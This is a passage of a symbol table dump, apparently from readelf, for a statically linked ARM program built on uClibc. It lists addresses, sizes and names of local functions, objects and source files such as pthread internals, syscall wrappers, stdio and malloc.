  403.   330: 00014d80    68 FUNC    LOCAL  DEFAULT    2 __pthread_alt_trylock
  404.   331: 00014d80     0 NOTYPE  LOCAL  DEFAULT    2 $a
  405.   332: 00014e04     0 NOTYPE  LOCAL  DEFAULT    2 $d
  406.   333: 00014e14     0 NOTYPE  LOCAL  DEFAULT    2 $a
  407.   334: 00014ef4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  408.   335: 00035a50    24 OBJECT  LOCAL  DEFAULT   10 once_masterlock
  409.   336: 00035a68    12 OBJECT  LOCAL  DEFAULT   10 once_finished
  410.   337: 00035a74     4 OBJECT  LOCAL  DEFAULT   10 fork_generation
  411.   338: 00014f04   124 FUNC    LOCAL  DEFAULT    2 thread_self
  412.   339: 00014f04     0 NOTYPE  LOCAL  DEFAULT    2 $a
  413.   340: 00014f68     0 NOTYPE  LOCAL  DEFAULT    2 $d
  414.   341: 00014f80     0 NOTYPE  LOCAL  DEFAULT    2 $a
  415.   342: 00014f98     0 NOTYPE  LOCAL  DEFAULT    2 $d
  416.   343: 00014fa8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  417.   344: 00015050     0 NOTYPE  LOCAL  DEFAULT    2 $d
  418.   345: 00015054     0 NOTYPE  LOCAL  DEFAULT    2 $a
  419.   346: 00015080     0 NOTYPE  LOCAL  DEFAULT    2 $d
  420.   347: 00015090     0 NOTYPE  LOCAL  DEFAULT    2 $a
  421.   348: 0001514c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  422.   349: 00015150     0 NOTYPE  LOCAL  DEFAULT    2 $a
  423.   350: 00015168     0 NOTYPE  LOCAL  DEFAULT    2 $d
  424.   351: 00015178     0 NOTYPE  LOCAL  DEFAULT    2 $a
  425.   352: 00015220     0 NOTYPE  LOCAL  DEFAULT    2 $d
  426.   353: 00015224     0 NOTYPE  LOCAL  DEFAULT    2 $a
  427.   354: 00015340     0 NOTYPE  LOCAL  DEFAULT    2 $d
  428.   355: 00015360    80 FUNC    LOCAL  DEFAULT    2 pthread_once_cancelhandle
  429.   356: 00015360     0 NOTYPE  LOCAL  DEFAULT    2 $a
  430.   357: 000153a0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  431.   358: 000153b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  432.   359: 000153c8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  433.   360: 000153d8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  434.   361: 00000000     0 FILE    LOCAL  DEFAULT  ABS ptlongjmp.c
  435.   362: 00015474   232 FUNC    LOCAL  DEFAULT    2 pthread_cleanup_upto
  436.   363: 00015474     0 NOTYPE  LOCAL  DEFAULT    2 $a
  437.   364: 00015544     0 NOTYPE  LOCAL  DEFAULT    2 $d
  438.   365: 0001555c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  439.   366: 00000000     0 FILE    LOCAL  DEFAULT  ABS specific.c
  440.   367: 0001558c   124 FUNC    LOCAL  DEFAULT    2 thread_self
  441.   368: 0001558c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  442.   369: 000155f0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  443.   370: 00015608     0 NOTYPE  LOCAL  DEFAULT    2 $a
  444.   371: 000156a0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  445.   372: 00035a78  8192 OBJECT  LOCAL  DEFAULT   10 pthread_keys
  446.   373: 000156a4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  447.   374: 00015794     0 NOTYPE  LOCAL  DEFAULT    2 $d
  448.   375: 00015798     0 NOTYPE  LOCAL  DEFAULT    2 $a
  449.   376: 0001581c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  450.   377: 00015820     0 NOTYPE  LOCAL  DEFAULT    2 $a
  451.   378: 000158d8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  452.   379: 00037a78    24 OBJECT  LOCAL  DEFAULT   10 pthread_keys_mutex
  453.   380: 000158ec     0 NOTYPE  LOCAL  DEFAULT    2 $a
  454.   381: 00015970     0 NOTYPE  LOCAL  DEFAULT    2 $d
  455.   382: 000227e4     0 NOTYPE  LOCAL  DEFAULT    4 $d
  456.   383: 00000000     0 FILE    LOCAL  DEFAULT  ABS mmap.c
  457.   384: 00015980     0 NOTYPE  LOCAL  DEFAULT    2 $a
  458.   385: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigaction.c
  459.   386: 000159e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  460.   387: 00015abc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  461.   388: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/cl
  462.   389: 00015ac4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  463.   390: 00015b04     0 NOTYPE  LOCAL  DEFAULT    2 __error
  464.   391: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/se
  465.   392: 00015b08     0 NOTYPE  LOCAL  DEFAULT    2 $a
  466.   393: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/si
  467.   394: 00015b18     0 NOTYPE  LOCAL  DEFAULT    2 $a
  468.   395: 00000000     0 FILE    LOCAL  DEFAULT  ABS __syscall_fcntl.c
  469.   396: 00015b20     0 NOTYPE  LOCAL  DEFAULT    2 $a
  470.   397: 00000000     0 FILE    LOCAL  DEFAULT  ABS __syscall_fcntl64.c
  471.   398: 00015b94     0 NOTYPE  LOCAL  DEFAULT    2 $a
  472.   399: 00000000     0 FILE    LOCAL  DEFAULT  ABS __syscall_rt_sigaction.c
  473.   400: 00015be4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  474.   401: 00000000     0 FILE    LOCAL  DEFAULT  ABS _exit.c
  475.   402: 00015c10     0 NOTYPE  LOCAL  DEFAULT    2 $a
  476.   403: 00000000     0 FILE    LOCAL  DEFAULT  ABS chdir.c
  477.   404: 00015c38     0 NOTYPE  LOCAL  DEFAULT    2 $a
  478.   405: 00000000     0 FILE    LOCAL  DEFAULT  ABS close.c
  479.   406: 00015c64     0 NOTYPE  LOCAL  DEFAULT    2 $a
  480.   407: 00000000     0 FILE    LOCAL  DEFAULT  ABS dup2.c
  481.   408: 00015c90     0 NOTYPE  LOCAL  DEFAULT    2 $a
  482.   409: 00000000     0 FILE    LOCAL  DEFAULT  ABS fork.c
  483.   410: 00015cbc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  484.   411: 00000000     0 FILE    LOCAL  DEFAULT  ABS fsync.c
  485.   412: 00015ce8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  486.   413: 00000000     0 FILE    LOCAL  DEFAULT  ABS getdtablesize.c
  487.   414: 00015d14     0 NOTYPE  LOCAL  DEFAULT    2 $a
  488.   415: 00000000     0 FILE    LOCAL  DEFAULT  ABS geteuid.c
  489.   416: 00015d3c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  490.   417: 00000000     0 FILE    LOCAL  DEFAULT  ABS getpagesize.c
  491.   418: 00015d68     0 NOTYPE  LOCAL  DEFAULT    2 $a
  492.   419: 00015d7c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  493.   420: 00000000     0 FILE    LOCAL  DEFAULT  ABS getpid.c
  494.   421: 00015d80     0 NOTYPE  LOCAL  DEFAULT    2 $a
  495.   422: 00000000     0 FILE    LOCAL  DEFAULT  ABS getppid.c
  496.   423: 00015dac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  497.   424: 00000000     0 FILE    LOCAL  DEFAULT  ABS getrlimit.c
  498.   425: 00015dd8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  499.   426: 00000000     0 FILE    LOCAL  DEFAULT  ABS gettimeofday.c
  500.   427: 00015e04     0 NOTYPE  LOCAL  DEFAULT    2 $a
  501.   428: 00000000     0 FILE    LOCAL  DEFAULT  ABS ioctl.c
  502.   429: 00015e30     0 NOTYPE  LOCAL  DEFAULT    2 $a
  503.   430: 00000000     0 FILE    LOCAL  DEFAULT  ABS kill.c
  504.   431: 00015e80     0 NOTYPE  LOCAL  DEFAULT    2 $a
  505.   432: 00000000     0 FILE    LOCAL  DEFAULT  ABS llseek.c
  506.   433: 00015eac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  507.   434: 00000000     0 FILE    LOCAL  DEFAULT  ABS longjmp.c
  508.   435: 00015f10     0 NOTYPE  LOCAL  DEFAULT    2 $a
  509.   436: 00000000     0 FILE    LOCAL  DEFAULT  ABS lseek.c
  510.   437: 00015f44     0 NOTYPE  LOCAL  DEFAULT    2 $a
  511.   438: 00000000     0 FILE    LOCAL  DEFAULT  ABS msync.c
  512.   439: 00015f70     0 NOTYPE  LOCAL  DEFAULT    2 $a
  513.   440: 00000000     0 FILE    LOCAL  DEFAULT  ABS munmap.c
  514.   441: 00015f9c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  515.   442: 00000000     0 FILE    LOCAL  DEFAULT  ABS nanosleep.c
  516.   443: 00015fc8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  517.   444: 00000000     0 FILE    LOCAL  DEFAULT  ABS open.c
  518.   445: 00015ff4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  519.   446: 0001605c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  520.   447: 00000000     0 FILE    LOCAL  DEFAULT  ABS open64.c
  521.   448: 00016060     0 NOTYPE  LOCAL  DEFAULT    2 $a
  522.   449: 00000000     0 FILE    LOCAL  DEFAULT  ABS pause.c
  523.   450: 0001609c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  524.   451: 00000000     0 FILE    LOCAL  DEFAULT  ABS pipe.c
  525.   452: 000160c8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  526.   453: 00000000     0 FILE    LOCAL  DEFAULT  ABS poll.c
  527.   454: 000160f4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  528.   455: 00000000     0 FILE    LOCAL  DEFAULT  ABS prctl.c
  529.   456: 00016120     0 NOTYPE  LOCAL  DEFAULT    2 $a
  530.   457: 00000000     0 FILE    LOCAL  DEFAULT  ABS pread_write.c
  531.   458: 00016150   236 FUNC    LOCAL  DEFAULT    2 __fake_pread_write64
  532.   459: 00016150     0 NOTYPE  LOCAL  DEFAULT    2 $a
  533.   460: 000162ac   184 FUNC    LOCAL  DEFAULT    2 __fake_pread_write
  534.   461: 00000000     0 FILE    LOCAL  DEFAULT  ABS read.c
  535.   462: 0001639c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  536.   463: 00000000     0 FILE    LOCAL  DEFAULT  ABS sched_get_priority_max.c
  537.   464: 000163c8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  538.   465: 00000000     0 FILE    LOCAL  DEFAULT  ABS sched_get_priority_min.c
  539.   466: 000163f4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  540.   467: 00000000     0 FILE    LOCAL  DEFAULT  ABS sched_getparam.c
  541.   468: 00016420     0 NOTYPE  LOCAL  DEFAULT    2 $a
  542.   469: 00000000     0 FILE    LOCAL  DEFAULT  ABS sched_getscheduler.c
  543.   470: 0001644c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  544.   471: 00000000     0 FILE    LOCAL  DEFAULT  ABS sched_setscheduler.c
  545.   472: 00016478     0 NOTYPE  LOCAL  DEFAULT    2 $a
  546.   473: 00000000     0 FILE    LOCAL  DEFAULT  ABS sched_yield.c
  547.   474: 000164a4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  548.   475: 00000000     0 FILE    LOCAL  DEFAULT  ABS select.c
  549.   476: 000164d0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  550.   477: 00000000     0 FILE    LOCAL  DEFAULT  ABS setrlimit.c
  551.   478: 00016500     0 NOTYPE  LOCAL  DEFAULT    2 $a
  552.   479: 00000000     0 FILE    LOCAL  DEFAULT  ABS setsid.c
  553.   480: 0001652c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  554.   481: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigprocmask.c
  555.   482: 00016558     0 NOTYPE  LOCAL  DEFAULT    2 $a
  556.   483: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigsuspend.c
  557.   484: 000165ac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  558.   485: 00000000     0 FILE    LOCAL  DEFAULT  ABS time.c
  559.   486: 000165dc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  560.   487: 00000000     0 FILE    LOCAL  DEFAULT  ABS wait.c
  561.   488: 00016608     0 NOTYPE  LOCAL  DEFAULT    2 $a
  562.   489: 00000000     0 FILE    LOCAL  DEFAULT  ABS wait4.c
  563.   490: 0001661c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  564.   491: 00000000     0 FILE    LOCAL  DEFAULT  ABS waitpid.c
  565.   492: 00016648     0 NOTYPE  LOCAL  DEFAULT    2 $a
  566.   493: 00000000     0 FILE    LOCAL  DEFAULT  ABS write.c
  567.   494: 00016650     0 NOTYPE  LOCAL  DEFAULT    2 $a
  568.   495: 00000000     0 FILE    LOCAL  DEFAULT  ABS isspace.c
  569.   496: 0001667c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  570.   497: 00016690     0 NOTYPE  LOCAL  DEFAULT    2 $d
  571.   498: 00000000     0 FILE    LOCAL  DEFAULT  ABS toupper.c
  572.   499: 00016694     0 NOTYPE  LOCAL  DEFAULT    2 $a
  573.   500: 000166c4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  574.   501: 00000000     0 FILE    LOCAL  DEFAULT  ABS __C_ctype_b.c
  575.   502: 00031540     0 NOTYPE  LOCAL  DEFAULT    9 $d
  576.   503: 00000000     0 FILE    LOCAL  DEFAULT  ABS __C_ctype_toupper.c
  577.   504: 00031548     0 NOTYPE  LOCAL  DEFAULT    9 $d
  578.   505: 00000000     0 FILE    LOCAL  DEFAULT  ABS errno.c
  579.   506: 00037a90     0 NOTYPE  LOCAL  DEFAULT   10 $d
  580.   507: 00000000     0 FILE    LOCAL  DEFAULT  ABS puts.c
  581.   508: 000166c8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  582.   509: 00016768     0 NOTYPE  LOCAL  DEFAULT    2 $d
  583.   510: 00000000     0 FILE    LOCAL  DEFAULT  ABS _stdio.c
  584.   511: 0001677c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  585.   512: 000167e8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  586.   513: 0003159c   240 OBJECT  LOCAL  DEFAULT    9 _stdio_streams
  587.   514: 000167ec     0 NOTYPE  LOCAL  DEFAULT    2 $a
  588.   515: 000167f8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  589.   516: 00022dec    24 OBJECT  LOCAL  DEFAULT    4 __stdio_mutex_initializer
  590.   517: 000167fc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  591.   518: 000168a4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  592.   519: 00031550     0 NOTYPE  LOCAL  DEFAULT    9 $d
  593.   520: 00037aa0  8192 OBJECT  LOCAL  DEFAULT   10 _fixed_buffers
  594.   521: 00022dec     0 NOTYPE  LOCAL  DEFAULT    4 $d
  595.   522: 00000000     0 FILE    LOCAL  DEFAULT  ABS _wcommit.c
  596.   523: 000168b4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  597.   524: 00000000     0 FILE    LOCAL  DEFAULT  ABS fputc_unlocked.c
  598.   525: 000168e4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  599.   526: 00000000     0 FILE    LOCAL  DEFAULT  ABS fputs_unlocked.c
  600.   527: 000169e8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  601.   528: 00000000     0 FILE    LOCAL  DEFAULT  ABS fwrite_unlocked.c
  602.   529: 00016a1c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  603.   530: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/string/arm/memcpy.S
  604.   531: 00016ad0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  605.   532: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/string/arm/memset.S
  606.   533: 00016ae0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  607.   534: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/string/arm/strcmp.S
  608.   535: 00016b80     0 NOTYPE  LOCAL  DEFAULT    2 $a
  609.   536: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/string/arm/strlen.S
  610.   537: 00016ba0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  611.   538: 00016bc8     0 NOTYPE  LOCAL  DEFAULT    2 Laligned
  612.   539: 00016be4     0 NOTYPE  LOCAL  DEFAULT    2 Llastword
  613.   540: 00000000     0 FILE    LOCAL  DEFAULT  ABS strchr.c
  614.   541: 00016c00     0 NOTYPE  LOCAL  DEFAULT    2 $a
  615.   542: 00016d00     0 NOTYPE  LOCAL  DEFAULT    2 $d
  616.   543: 00000000     0 FILE    LOCAL  DEFAULT  ABS strcpy.c
  617.   544: 00016d08     0 NOTYPE  LOCAL  DEFAULT    2 $a
  618.   545: 00000000     0 FILE    LOCAL  DEFAULT  ABS strstr.c
  619.   546: 00016d24     0 NOTYPE  LOCAL  DEFAULT    2 $a
  620.   547: 00000000     0 FILE    LOCAL  DEFAULT  ABS strtok.c
  621.   548: 00016e1c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  622.   549: 00016e24     0 NOTYPE  LOCAL  DEFAULT    2 $d
  623.   550: 00039aa0     4 OBJECT  LOCAL  DEFAULT   10 next_start.1066
  624.   551: 00000000     0 FILE    LOCAL  DEFAULT  ABS isatty.c
  625.   552: 00016e28     0 NOTYPE  LOCAL  DEFAULT    2 $a
  626.   553: 00000000     0 FILE    LOCAL  DEFAULT  ABS tcdrain.c
  627.   554: 00016e48     0 NOTYPE  LOCAL  DEFAULT    2 $a
  628.   555: 00016e54     0 NOTYPE  LOCAL  DEFAULT    2 $d
  629.   556: 00000000     0 FILE    LOCAL  DEFAULT  ABS tcgetattr.c
  630.   557: 00016e58     0 NOTYPE  LOCAL  DEFAULT    2 $a
  631.   558: 00016ec0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  632.   559: 00000000     0 FILE    LOCAL  DEFAULT  ABS ntohl.c
  633.   560: 00016ec4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  634.   561: 00000000     0 FILE    LOCAL  DEFAULT  ABS inet_ntoa.c
  635.   562: 00016f34     0 NOTYPE  LOCAL  DEFAULT    2 $a
  636.   563: 00016fbc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  637.   564: 00039aa4    16 OBJECT  LOCAL  DEFAULT   10 buf.2613
  638.   565: 00000000     0 FILE    LOCAL  DEFAULT  ABS inet_makeaddr.c
  639.   566: 00016fc0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  640.   567: 00000000     0 FILE    LOCAL  DEFAULT  ABS accept.c
  641.   568: 00016fe4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  642.   569: 00000000     0 FILE    LOCAL  DEFAULT  ABS connect.c
  643.   570: 00017010     0 NOTYPE  LOCAL  DEFAULT    2 $a
  644.   571: 00000000     0 FILE    LOCAL  DEFAULT  ABS getsockname.c
  645.   572: 0001703c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  646.   573: 00000000     0 FILE    LOCAL  DEFAULT  ABS getsockopt.c
  647.   574: 00017068     0 NOTYPE  LOCAL  DEFAULT    2 $a
  648.   575: 00000000     0 FILE    LOCAL  DEFAULT  ABS recv.c
  649.   576: 00017098     0 NOTYPE  LOCAL  DEFAULT    2 $a
  650.   577: 00000000     0 FILE    LOCAL  DEFAULT  ABS recvfrom.c
  651.   578: 000170c4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  652.   579: 00000000     0 FILE    LOCAL  DEFAULT  ABS recvmsg.c
  653.   580: 000170f8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  654.   581: 00000000     0 FILE    LOCAL  DEFAULT  ABS send.c
  655.   582: 00017124     0 NOTYPE  LOCAL  DEFAULT    2 $a
  656.   583: 00000000     0 FILE    LOCAL  DEFAULT  ABS sendmsg.c
  657.   584: 00017150     0 NOTYPE  LOCAL  DEFAULT    2 $a
  658.   585: 00000000     0 FILE    LOCAL  DEFAULT  ABS sendto.c
  659.   586: 0001717c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  660.   587: 00000000     0 FILE    LOCAL  DEFAULT  ABS setsockopt.c
  661.   588: 000171b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  662.   589: 00000000     0 FILE    LOCAL  DEFAULT  ABS socket.c
  663.   590: 000171e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  664.   591: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigaddset.c
  665.   592: 0001720c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  666.   593: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigdelset.c
  667.   594: 0001723c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  668.   595: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigempty.c
  669.   596: 0001726c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  670.   597: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigfillset.c
  671.   598: 00017284     0 NOTYPE  LOCAL  DEFAULT    2 $a
  672.   599: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigismem.c
  673.   600: 0001729c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  674.   601: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigjmp.c
  675.   602: 000172cc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  676.   603: 00000000     0 FILE    LOCAL  DEFAULT  ABS signal.c
  677.   604: 00017308     0 NOTYPE  LOCAL  DEFAULT    2 $a
  678.   605: 000173bc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  679.   606: 00000000     0 FILE    LOCAL  DEFAULT  ABS sigsetops.c
  680.   607: 000173c0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  681.   608: 00000000     0 FILE    LOCAL  DEFAULT  ABS malloc.c
  682.   609: 0001742c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  683.   610: 00017568     0 NOTYPE  LOCAL  DEFAULT    2 $d
  684.   611: 0003168c     0 NOTYPE  LOCAL  DEFAULT    9 $d
  685.   612: 00031690   260 OBJECT  LOCAL  DEFAULT    9 initial_fa
  686.   613: 00000000     0 FILE    LOCAL  DEFAULT  ABS calloc.c
  687.   614: 00017580     0 NOTYPE  LOCAL  DEFAULT    2 $a
  688.   615: 00000000     0 FILE    LOCAL  DEFAULT  ABS free.c
  689.   616: 000175d8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  690.   617: 000176b0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  691.   618: 00000000     0 FILE    LOCAL  DEFAULT  ABS heap_alloc.c
  692.   619: 000176c8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  693.   620: 00000000     0 FILE    LOCAL  DEFAULT  ABS heap_free.c
  694.   621: 0001775c    32 FUNC    LOCAL  DEFAULT    2 __heap_link_free_area
  695.   622: 0001775c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  696.   623: 0001777c    20 FUNC    LOCAL  DEFAULT    2 __heap_link_free_area_aft
  697.   624: 00000000     0 FILE    LOCAL  DEFAULT  ABS abort.c
  698.   625: 00017884     0 NOTYPE  LOCAL  DEFAULT    2 $a
  699.   626: 000179bc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  700.   627: 00031794    24 OBJECT  LOCAL  DEFAULT    9 mylock
  701.   628: 00039acc     4 OBJECT  LOCAL  DEFAULT   10 been_there_done_that
  702.   629: 00031794     0 NOTYPE  LOCAL  DEFAULT    9 $d
  703.   630: 00000000     0 FILE    LOCAL  DEFAULT  ABS rand.c
  704.   631: 000179cc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  705.   632: 00000000     0 FILE    LOCAL  DEFAULT  ABS random.c
  706.   633: 000179d0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  707.   634: 00017a34     0 NOTYPE  LOCAL  DEFAULT    2 $d
  708.   635: 000317ac    24 OBJECT  LOCAL  DEFAULT    9 mylock
  709.   636: 000317c4    28 OBJECT  LOCAL  DEFAULT    9 unsafe_state
  710.   637: 00017a4c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  711.   638: 00017ac0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  712.   639: 00017ad8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  713.   640: 00017b58     0 NOTYPE  LOCAL  DEFAULT    2 $d
  714.   641: 00017b70     0 NOTYPE  LOCAL  DEFAULT    2 $a
  715.   642: 00017bd4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  716.   643: 000317ac     0 NOTYPE  LOCAL  DEFAULT    9 $d
  717.   644: 000317e0   128 OBJECT  LOCAL  DEFAULT    9 randtbl
  718.   645: 00000000     0 FILE    LOCAL  DEFAULT  ABS random_r.c
  719.   646: 00017bec     0 NOTYPE  LOCAL  DEFAULT    2 $a
  720.   647: 00017ca8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  721.   648: 00022e04    40 OBJECT  LOCAL  DEFAULT    4 random_poly_info
  722.   649: 00017cac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  723.   650: 00017d38     0 NOTYPE  LOCAL  DEFAULT    2 $d
  724.   651: 00017d3c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  725.   652: 00017dfc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  726.   653: 00017e08     0 NOTYPE  LOCAL  DEFAULT    2 $a
  727.   654: 00017ecc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  728.   655: 00022e04     0 NOTYPE  LOCAL  DEFAULT    4 $d
  729.   656: 00000000     0 FILE    LOCAL  DEFAULT  ABS system.c
  730.   657: 00017ed0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  731.   658: 00017ffc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  732.   659: 00000000     0 FILE    LOCAL  DEFAULT  ABS atol.c
  733.   660: 00018008     0 NOTYPE  LOCAL  DEFAULT    2 $a
  734.   661: 00000000     0 FILE    LOCAL  DEFAULT  ABS strtol.c
  735.   662: 00018014     0 NOTYPE  LOCAL  DEFAULT    2 $a
  736.   663: 00000000     0 FILE    LOCAL  DEFAULT  ABS _stdlib_strto_l.c
  737.   664: 0001801c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  738.   665: 000181b0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  739.   666: 00000000     0 FILE    LOCAL  DEFAULT  ABS exit.c
  740.   667: 000181b4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  741.   668: 0001822c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  742.   669: 00031860     0 NOTYPE  LOCAL  DEFAULT    9 $d
  743.   670: 00000000     0 FILE    LOCAL  DEFAULT  ABS on_exit.c
  744.   671: 00018248     0 NOTYPE  LOCAL  DEFAULT    2 $a
  745.   672: 00000000     0 FILE    LOCAL  DEFAULT  ABS execl.c
  746.   673: 0001827c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  747.   674: 0001830c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  748.   675: 00000000     0 FILE    LOCAL  DEFAULT  ABS sleep.c
  749.   676: 00018310     0 NOTYPE  LOCAL  DEFAULT    2 $a
  750.   677: 000184b0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  751.   678: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc_pthread_init.c
  752.   679: 000184b4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  753.   680: 000184bc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  754.   681: 00000000     0 FILE    LOCAL  DEFAULT  ABS __uClibc_main.c
  755.   682: 000184c0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  756.   683: 0001851c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  757.   684: 0001852c     8 FUNC    LOCAL  DEFAULT    2 __pthread_return_0
  758.   685: 0001852c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  759.   686: 00018534     4 FUNC    LOCAL  DEFAULT    2 __pthread_return_void
  760.   687: 00018538    56 FUNC    LOCAL  DEFAULT    2 __check_one_fd
  761.   688: 0001856c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  762.   689: 00018570     0 NOTYPE  LOCAL  DEFAULT    2 $a
  763.   690: 000185bc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  764.   691: 00039aec     4 OBJECT  LOCAL  DEFAULT   10 been_there_done_that.2789
  765.   692: 000185cc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  766.   693: 000187e4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  767.   694: 00031878     0 NOTYPE  LOCAL  DEFAULT    9 $d
  768.   695: 00000000     0 FILE    LOCAL  DEFAULT  ABS rpc_thread.c
  769.   696: 00018818    48 FUNC    LOCAL  DEFAULT    2 rpc_thread_multi
  770.   697: 00018818     0 NOTYPE  LOCAL  DEFAULT    2 $a
  771.   698: 0001883c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  772.   699: 00039af4   200 OBJECT  LOCAL  DEFAULT   10 __libc_tsd_RPC_VARS_mem
  773.   700: 00018848     0 NOTYPE  LOCAL  DEFAULT    2 $a
  774.   701: 00018934     0 NOTYPE  LOCAL  DEFAULT    2 $d
  775.   702: 00039af0     4 OBJECT  LOCAL  DEFAULT   10 once.5558
  776.   703: 0001894c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  777.   704: 0001896c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  778.   705: 00018974     0 NOTYPE  LOCAL  DEFAULT    2 $a
